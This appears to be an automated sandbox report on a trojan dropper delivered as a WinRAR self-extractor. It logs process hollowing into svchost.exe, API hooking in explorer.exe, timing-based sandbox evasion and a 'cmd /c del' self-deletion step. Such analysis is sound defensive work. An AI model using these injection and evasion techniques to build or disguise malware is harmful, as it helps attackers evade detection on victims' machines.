            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00401030
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041DAE4
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041E544
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041ED4C
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00402D90
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00409E5B
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00409E60
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: String function: 00C7F5F0 appears 31 times
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: String function: 00C7EB78 appears 39 times
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: String function: 00C7EC50 appears 56 times
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: String function: 0164B150 appears 32 times
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD043D GetTempFileNameW,NtSetInformationFile,NtWriteFile,CreateProcessInternalW,GetThreadContext,SetThreadContext,GetThreadContext,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD07DF NtOpenFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016895D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016898F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016897A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689560 NtWriteFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689950 NtQueueApcThread,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689520 NtWaitForSingleObject,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168AD30 NtSetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016895F0 NtQueryInformationFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016899D0 NtCreateProcessEx,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168B040 NtSuspendThread,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689820 NtEnumerateKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016898A0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689760 NtOpenProcess,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689770 NtSetInformationFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168A770 NtOpenThread,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689730 NtQueryVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689B00 NtSetValueKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168A710 NtOpenProcessToken,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689FE0 NtCreateMutant,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168A3B0 NtGetContextThread,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689670 NtQueryInformationProcess,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689650 NtQueryValueKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689610 NtEnumerateValueKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A10 NtQuerySection,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016896D0 NtCreateKey,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689A80 NtOpenDirectoryObject,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A360 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A410 NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A490 NtClose,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A35A NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A3B2 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A40A NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A48B NtClose,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
            Source: F61A.tmp.1.drStatic PE information: No import functions for PE file found
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeSection loaded: dxgidebug.dll
            Source: F61A.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: F61A.tmp.1.drStatic PE information: Section .text
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile read: C:\Users\user\Desktop\primosdv3.1.1.0.exeJump to behavior
            Source: primosdv3.1.1.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\primosdv3.1.1.0.exe C:\Users\user\Desktop\primosdv3.1.1.0.exe
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@2/2
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C66C74 GetLastError,FormatMessageW,
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_01
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: sfxname
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: sfxstime
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCommand line argument: STARTDLG
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: primosdv3.1.1.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: primosdv3.1.1.0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: primosdv3.1.1.0.exe
            Source: Binary string: wntdll.pdbUGP source: bstkiooen.exe, 00000001.00000003.255333801.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000001.00000003.253799569.0000000002B30000.00000004.00001000.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: bstkiooen.exe, bstkiooen.exe, 00000002.00000003.256993288.00000000012EE000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.368102865.0000000001620000.00000040.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000003.258974498.0000000001485000.00000004.00000800.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.370001288.000000000173F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.369549780.0000000003300000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.516086172.000000000361F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.514388101.0000000003500000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: bstkiooen.exe, 00000002.00000002.367843767.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, bstkiooen.exe, 00000002.00000002.372391636.00000000034E0000.00000040.10000000.00040000.00000000.sdmp
            Source: primosdv3.1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: primosdv3.1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: primosdv3.1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: primosdv3.1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: primosdv3.1.1.0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F640 push ecx; ret
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7EB78 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0169D0D1 push ecx; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00417B13 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041D4B5 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_00417D68 push edx; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041D56C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041D502 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0041D50B push eax; ret
            Source: primosdv3.1.1.0.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7139109Jump to behavior
            Source: initial sampleStatic PE information: section name: .text entropy: 7.410591725114109
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeFile created: C:\Users\user\AppData\Local\Temp\bstkiooen.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeFile created: C:\Users\user\AppData\Local\Temp\F61A.tmpJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\F61A.TMP
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F61A.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01686DE6 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeAPI coverage: 9.3 %
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7E6A3 VirtualQuery,GetSystemInfo,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C8B348 FindFirstFileExA,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeAPI call chain: ExitProcess graph end node
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
            Source: explorer.exe, 00000003.00000000.304900101.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.308116481.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
            Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
            Source: explorer.exe, 00000003.00000000.299904671.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
            Source: explorer.exe, 00000003.00000000.334006724.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000003.00000000.284751375.000000000F62F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft Sto
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C8C030 GetProcessHeap,
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01686DE6 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C87DEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD007A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD0019 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD0149 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD0005 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01683D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01667D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
